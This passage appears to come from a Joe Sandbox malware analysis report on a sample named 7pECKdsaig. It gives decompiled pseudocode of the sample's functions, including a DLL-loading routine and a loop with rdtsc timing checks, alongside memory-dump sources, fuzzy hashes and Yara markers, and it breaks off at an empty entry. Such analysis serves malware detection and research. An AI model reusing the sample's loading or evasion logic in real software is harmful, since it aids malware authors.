Associated: 00000000.00000002.288891710.0000000000A9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.288903814.0000000000AA0000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a80000_7pECKdsaig.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 1d6e66827e6c4450caf5d3e7831a32d6282e94e63c43afec602aefafe6c27fae
Instruction ID: 76bdeaf7ac2892a199cca6830444660f31500bc55789229b3032d443abcfed9b
Opcode Fuzzy Hash: 1d6e66827e6c4450caf5d3e7831a32d6282e94e63c43afec602aefafe6c27fae
Instruction Fuzzy Hash: 97E0EC766002106BDB14EBA8CC85EE77B58EF45360F1545AAB95D9B242D531E50087A0

Uniqueness

Uniqueness Score: -1.00%

Function 00A9A480 Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00A9A480(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0xa8a933
				E00A9AF50(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}

0x00a9a483
0x00a9a486
0x00a9a48f
0x00a9a497
0x00a9a4a5
0x00a9a4a9

APIs

NtClose.NTDLL(00A94D40,?,?,00A94D40,00A89CE3,FFFFFFFF), ref: 00A9A4A5

Memory Dump Source

Source File: 00000000.00000002.288830411.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000000.00000002.288819285.0000000000A80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.288891710.0000000000A9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.288903814.0000000000AA0000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a80000_7pECKdsaig.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: 979b39916a2e0f77df60a4ba1ef322db6e398d28f90283c5926c75c0e05f0176
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: D8D01776200214ABDB10EB98CC85EA77BACEF48760F154499BA1C9B242C530FA0086E0

Uniqueness

Uniqueness Score: -1.00%

Function 01759540 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0175954A

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 26e81715abbe59193599ad6cff2f54ba1d2afc6df706104eec9a0f86526e2f61
Instruction ID: 58d29fd8f3092561d818073debf2e1fa1412821d8d281e55faece6183825a86f
Opcode Fuzzy Hash: 26e81715abbe59193599ad6cff2f54ba1d2afc6df706104eec9a0f86526e2f61
Instruction Fuzzy Hash: A5900265325004070115A59A4704507404AA7D9391351C031F5405550CDA6188617161

Uniqueness

Uniqueness Score: -1.00%

Function 01759910 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0175991A

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 401295cc5fd6469bb13b21acdb0f1470a25767559dbce6c9641ca89301a2d43b
Instruction ID: 834f4a569e77bd8f5e9c98e47625b2f4276fa34a7c7052b3a6bd37ae2b932134
Opcode Fuzzy Hash: 401295cc5fd6469bb13b21acdb0f1470a25767559dbce6c9641ca89301a2d43b
Instruction Fuzzy Hash: 879002B131500806D150719A84047464009A7D4341F51C021A9454554ECA998DD576A5

Uniqueness

Uniqueness Score: -1.00%

Function 017595D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 017595DA

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8309c0f5b3f768f53f517b4933e7316f21418f2ad982992da383cd3687b017b8
Instruction ID: 98a7735f009bda13d4e8ec7d5d8867041b941ead3ba5441a7f953da758b18cba
Opcode Fuzzy Hash: 8309c0f5b3f768f53f517b4933e7316f21418f2ad982992da383cd3687b017b8
Instruction Fuzzy Hash: 9D9002A1316004074115719A8414616800EA7E4241B51C031E5404590DC96588917165

Uniqueness

Uniqueness Score: -1.00%

Function 017599A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 017599AA

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 451da52a33e34ac390ec85179fe787ab5c5f0ea9f87cce6d4cc5bb0c3b7f1a6e
Instruction ID: 6eb8c2e6c3de9fd90129402523b3b32c6968879cbbb55bcb761a1180205462d5
Opcode Fuzzy Hash: 451da52a33e34ac390ec85179fe787ab5c5f0ea9f87cce6d4cc5bb0c3b7f1a6e
Instruction Fuzzy Hash: 509002A135500846D110619A8414B064009E7E5341F51C025E5454554DCA59CC527166

Uniqueness

Uniqueness Score: -1.00%

Function 01759860 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0175986A

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b067af2d964a955e37ccd6a1b2e278ff599549cdbf34da4412fe6ba01bb35c20
Instruction ID: 629727a7ae675f3e0e32fb2fa842a463f7b10fd3d1a8295caa907f878ce8bb69
Opcode Fuzzy Hash: b067af2d964a955e37ccd6a1b2e278ff599549cdbf34da4412fe6ba01bb35c20
Instruction Fuzzy Hash: A490027131500817D121619A8504707400DA7D4281F91C422A4814558DDA968952B161

Uniqueness

Uniqueness Score: -1.00%

Function 01759840 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0175984A

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8b43f113bdc97a7634cec38878f50f5ab90d829341141523d54426433127a6c2
Instruction ID: 85ee13ff4fa0b772b0ed031749e8a2a5bb1e5db8e769ac49fc180151e59e6679
Opcode Fuzzy Hash: 8b43f113bdc97a7634cec38878f50f5ab90d829341141523d54426433127a6c2
Instruction Fuzzy Hash: 9C900261356045565555B19A8404507800AB7E4281791C022A5804950CC9669856F661

Uniqueness

Uniqueness Score: -1.00%

Function 017598F0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 017598FA

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7e83690e6492ac161b4d35cfe705da9919bdc31bf608f85f02e3b43b022ab26c
Instruction ID: 2180f55a542fb8f78a9a90a256fab85f9ee21e851cd7be5e155dbf99f61cd5dc
Opcode Fuzzy Hash: 7e83690e6492ac161b4d35cfe705da9919bdc31bf608f85f02e3b43b022ab26c
Instruction Fuzzy Hash: 8890026171500906D111719A8404616400EA7D4281F91C032A5414555ECE658992B171

Uniqueness

Uniqueness Score: -1.00%

Function 01759710 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0175971A

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4db4ebf244dfd25739082473b00c5ef01e15502feac5594b22b03b8b530c6270
Instruction ID: bcd0c1f04adb9fc4837872ede0d79e2cd39d4c3092d6ae13b130450180461d12
Opcode Fuzzy Hash: 4db4ebf244dfd25739082473b00c5ef01e15502feac5594b22b03b8b530c6270
Instruction Fuzzy Hash: 1A90027131500806D11065DA94086464009A7E4341F51D021A9414555ECAA588917171

Uniqueness

Uniqueness Score: -1.00%

Function 017597A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 017597AA

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d19322abcbe5b77f2331f74ec9f9dff9eb6b756f2fda60031a3b536b615c572e
Instruction ID: 5795688dd1a40193616bb796bb87086477f242ecfb4ee96726a23c1bd1b3eb82
Opcode Fuzzy Hash: d19322abcbe5b77f2331f74ec9f9dff9eb6b756f2fda60031a3b536b615c572e
Instruction Fuzzy Hash: DE90026131500407D150719A94186068009F7E5341F51D021E4804554CDD5588567262

Uniqueness

Uniqueness Score: -1.00%

Function 01759780 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0175978A

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b4df559a4e28a68bc547dc0d72d9943fbb49bf726b2d9ccd2bd3ea22b390f798
Instruction ID: 8f45b5924f0998d4e49ecb917e6f3b8249f6a72804d37bf9d2f8f58a9fb7b0b3
Opcode Fuzzy Hash: b4df559a4e28a68bc547dc0d72d9943fbb49bf726b2d9ccd2bd3ea22b390f798
Instruction Fuzzy Hash: 5190026932700406D190719A940860A4009A7D5242F91D425A4405558CCD5588697361

Uniqueness

Uniqueness Score: -1.00%

Function 01759660 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0175966A

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f7f283916b179743b7f0dda35dc994a7dfd1ca197dcae0c1d119563c4c2b1ab6
Instruction ID: 3f145d0d0c1fe763a2a1ce7f22a0090b583caf92c9a44847da693cb4b779c547
Opcode Fuzzy Hash: f7f283916b179743b7f0dda35dc994a7dfd1ca197dcae0c1d119563c4c2b1ab6
Instruction Fuzzy Hash: FE90027131500C06D190719A840464A4009A7D5341F91C025A4415654DCE558A5977E1

Uniqueness

Uniqueness Score: -1.00%

Function 01759A50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01759A5A

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4f7dddac4d9aedab77d92273f0198df35ddbc6fd87bc8659b7d6c540f05f396f
Instruction ID: 04f5955adba394b55514fe8ddd8463de76f24851a5d4c39d9300a596a08e622b
Opcode Fuzzy Hash: 4f7dddac4d9aedab77d92273f0198df35ddbc6fd87bc8659b7d6c540f05f396f
Instruction Fuzzy Hash: 1C90026132580446D21065AA8C14B074009A7D4343F51C125A4544554CCD5588617561

Uniqueness

Uniqueness Score: -1.00%

Function 01759A20 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01759A2A

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: acc39c478c64f9d83cfcc1ab9cfc9490ba6cac331791ad8d3716cbae99c35554
Instruction ID: b86e2c9f6a8bcdb290caf89d8abea61150be7067de0e5864b6be906acb270bde
Opcode Fuzzy Hash: acc39c478c64f9d83cfcc1ab9cfc9490ba6cac331791ad8d3716cbae99c35554
Instruction Fuzzy Hash: AA90026171500446415071AAC8449068009BBE5251751C131A4D88550DC999886576A5

Uniqueness

Uniqueness Score: -1.00%

Function 01759A00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01759A0A

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 195377a14f8c971c86655ba78b4383b81eb7ffeee7db56424b0b7f4f6932133d
Instruction ID: 941bc59eb1005b40cccac7f055d687af7475f1c38ac05765b51282c9f96e8c6e
Opcode Fuzzy Hash: 195377a14f8c971c86655ba78b4383b81eb7ffeee7db56424b0b7f4f6932133d
Instruction Fuzzy Hash: 2790027131540806D110619A881470B4009A7D4342F51C021A5554555DCA65885175B1

Uniqueness

Uniqueness Score: -1.00%

Function 017596E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 017596EA

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6d66e3652616a153122a3b9cfdb57e277bf5f7301a129877d1250775f16ab285
Instruction ID: 552be38f6fc321dc2103207fe04c882348442f048a221fe0994a0cde47a66b1b
Opcode Fuzzy Hash: 6d66e3652616a153122a3b9cfdb57e277bf5f7301a129877d1250775f16ab285
Instruction Fuzzy Hash: D090027131508C06D120619AC40474A4009A7D4341F55C421A8814658DCAD588917161

Uniqueness

Uniqueness Score: -1.00%

Function 00A89AA0 Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00A89AA0(intOrPtr _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t50;
				intOrPtr _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;

				_t52 = _a4;
				_t39 = 0; // executed
				_t24 = E00A87EA0(_t52,  &_v24); // executed
				_t54 = _t53 + 8;
				if(_t24 != 0) {
					E00A880B0( &_v24,  &_v840);
					_t55 = _t54 + 8;
					do {
						E00A9BE00( &_v284, 0x104);
						E00A9C470( &_v284,  &_v804);
						_t56 = _t55 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_t31 = E00A94DE0(E00A94D80(_t52, _t50),  &_v284);
							_t56 = _t56 + 0x10;
							if(_t31 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							goto L8;
						}
						_t9 = _t52 + 0x14; // 0xffffe055
						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
						_t39 = 1;
						L8:
						_t33 = E00A880E0( &_v24,  &_v840);
						_t55 = _t56 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_t34 = E00A88160(_t52,  &_v24); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
					_t20 = _t52 + 0x31; // 0x5608758b
					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}

0x00a89aab
0x00a89ab3
0x00a89ab5
0x00a89aba
0x00a89abf
0x00a89ad2
0x00a89ad7
0x00a89ae0
0x00a89aec
0x00a89aff
0x00a89b04
0x00a89b07
0x00a89b10
0x00a89b22
0x00a89b27
0x00a89b2c
0x00000000
0x00000000
0x00a89b2e
0x00a89b32
0x00000000
0x00000000
0x00a89b34
0x00000000
0x00a89b32
0x00a89b36
0x00a89b39
0x00a89b3f
0x00a89b41
0x00a89b4c
0x00a89b51
0x00a89b54
0x00a89b61
0x00a89b6c
0x00a89b6e
0x00a89b74
0x00a89b78
0x00a89b7b
0x00a89b7b
0x00a89b82
0x00a89b85
0x00a89b8a
0x00a89b97
0x00a89ac6
0x00a89ac6
0x00a89ac6

Memory Dump Source

Source File: 00000000.00000002.288830411.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000000.00000002.288819285.0000000000A80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.288891710.0000000000A9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.288903814.0000000000AA0000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a80000_7pECKdsaig.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9835c872434805b420af9e009800db09fa022f69ef5fa6a2d6e4e63ee433b124
Instruction ID: 3e4adf76723213499b829044b322dc9ce8b07056189f62b839fd2afc257ee546
Opcode Fuzzy Hash: 9835c872434805b420af9e009800db09fa022f69ef5fa6a2d6e4e63ee433b124
Instruction Fuzzy Hash: 00210772D442185BCB25E764AE52AFFB3BCAB54344F48016DF94993141FA34AE0987B1

Uniqueness

Uniqueness Score: -1.00%

Function 00A88310 Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E00A88310(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				E00A9BE50( &_v67, 0, 0x3f);
				E00A9C9F0( &_v68, 3);
				_t12 = E00A8ACE0(_t30, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00A94E40(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E00A8A470(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}

0x00a88310
0x00a8831f
0x00a88323
0x00a8832e
0x00a8833e
0x00a8834e
0x00a88353
0x00a8835a
0x00a8835d
0x00a8836a
0x00a8836c
0x00a8836e
0x00a8838b
0x00a8838b
0x00000000
0x00a8838d
0x00a88392

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 00A8836A

Memory Dump Source

Source File: 00000000.00000002.288830411.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000000.00000002.288819285.0000000000A80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.288891710.0000000000A9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.288903814.0000000000AA0000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a80000_7pECKdsaig.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: b0fcd880289c8ecfbeb793961d9b547f85606b63ac5ed8a73f76917213b02706
Instruction ID: 81bf291b3d5cacc62dd9b0aab8687c4743d04851b3d21d8b1c64ae9be0f38c5e
Opcode Fuzzy Hash: b0fcd880289c8ecfbeb793961d9b547f85606b63ac5ed8a73f76917213b02706
Instruction Fuzzy Hash: 5C018471A8022877EB20B6949D03FFE776CAB40F50F040115FF04BA1C2EA98690647F6

Uniqueness

Uniqueness Score: -1.00%

Function 00A8ACD4 Relevance: 1.5, APIs: 1, Instructions: 34
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 89%

			E00A8ACD4(void* __eax, void* __ecx, void* __eflags) {
				struct _OBJDIR_INFORMATION _t20;
				void* _t23;
				struct _OBJDIR_INFORMATION _t25;

				if(__eflags >= 0) {
					L7:
					LdrLoadDll(0, 0, 0xffffffffa430df78, 0xffffffffa430df74); // executed
					_t20 =  *0xFFFFFFFFA430DF74;
					goto L8;
				} else {
					asm("daa");
					_push(0xa430df80);
					_t30 =  *0xFFFFFFFFA430DF8C;
					 *0xFFFFFFFFA430DF7C = 0xffffffffa430dd6c;
					_t23 = E00A9CC40(0xffffffffa430df78, 0x104,  *0xFFFFFFFFA430DF8C);
					if(_t23 != 0) {
						_t25 = E00A9D060( *((intOrPtr*)(0xffffffffa430df7c)), _t30, __eflags,  *((intOrPtr*)(0xffffffffa430df7c)));
						__eflags = _t25;
						if(_t25 != 0) {
							E00A9D2E0(0xffffffffa430df78, 0);
						}
						_t20 = E00A9B490( *((intOrPtr*)(0xffffffffa430df7c)));
						 *0xFFFFFFFFA430DF74 = _t20;
						__eflags = _t20;
						if(_t20 == 0) {
							goto L7;
						}
						L8:
						return _t20;
					} else {
						return _t23;
					}
				}
			}

0x00a8acd5
0x00a8ad40
0x00a8ad52
0x00a8ad54
0x00000000
0x00a8acd7
0x00a8acd7
0x00a8ace0
0x00a8ace9
0x00a8acfc
0x00a8acff
0x00a8ad09
0x00a8ad13
0x00a8ad1b
0x00a8ad1d
0x00a8ad25
0x00a8ad2a
0x00a8ad31
0x00a8ad39
0x00a8ad3c
0x00a8ad3e
0x00000000
0x00000000
0x00a8ad57
0x00a8ad5a
0x00a8ad0b
0x00a8ad0e
0x00a8ad0e
0x00a8ad09

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00A8AD52

Memory Dump Source

Source File: 00000000.00000002.288830411.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000000.00000002.288819285.0000000000A80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.288891710.0000000000A9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.288903814.0000000000AA0000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a80000_7pECKdsaig.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: c4e70a7a1212cc6ecd9781bf9e0a9810e00a3649e48ab306136b5ded73e65874
Instruction ID: 5c90b192790342b49d84f440b2a7eed1c2e5265388f32cb74225994fd33cdd4d
Opcode Fuzzy Hash: c4e70a7a1212cc6ecd9781bf9e0a9810e00a3649e48ab306136b5ded73e65874
Instruction Fuzzy Hash: BEF05475E5010DABEF00DA94D842FDDB7F59B54309F0082D5ED1CDB640F5719A588751

Uniqueness

Uniqueness Score: -1.00%

Function 00A9A620 Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00A9A620(intOrPtr _a4, void* _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E00A9AF50(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
				return _t10;
			}

0x00a9a637
0x00a9a64d
0x00a9a651

APIs

RtlAllocateHeap.NTDLL(00A94526,?,00A94C9F,00A94C9F,?,00A94526,?,?,?,?,?,00000000,00A89CE3,?), ref: 00A9A64D

Memory Dump Source

Source File: 00000000.00000002.288830411.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000000.00000002.288819285.0000000000A80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.288891710.0000000000A9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.288903814.0000000000AA0000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a80000_7pECKdsaig.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: 0f60b9beae202daff58441045d03e48b72880b312970e36183f93b7e3fcaa272
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: 59E012B6200208ABDB14EF99CC41EA777ACAF88754F118559BA1C5B242C630F9108AF0

Uniqueness

Uniqueness Score: -1.00%

Function 00A9A660 Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00A9A660(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E00A9AF50(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}

0x00a9a66f
0x00a9a677
0x00a9a68d
0x00a9a691

APIs

RtlFreeHeap.NTDLL(00000060,00A89CE3,?,?,00A89CE3,00000060,00000000,00000000,?,?,00A89CE3,?,00000000), ref: 00A9A68D

Memory Dump Source

Source File: 00000000.00000002.288830411.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000000.00000002.288819285.0000000000A80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.288891710.0000000000A9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.288903814.0000000000AA0000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a80000_7pECKdsaig.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: e1028d42af1cd2f42196b2ae0c0412a1efdf17147569a9862ec05e5882e703e1
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: C5E012B6200208ABDB18EF99CC49EA777ACAF88750F018559BA1C5B242C630E9108AF0

Uniqueness

Uniqueness Score: -1.00%

Function 00A9A7C0 Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

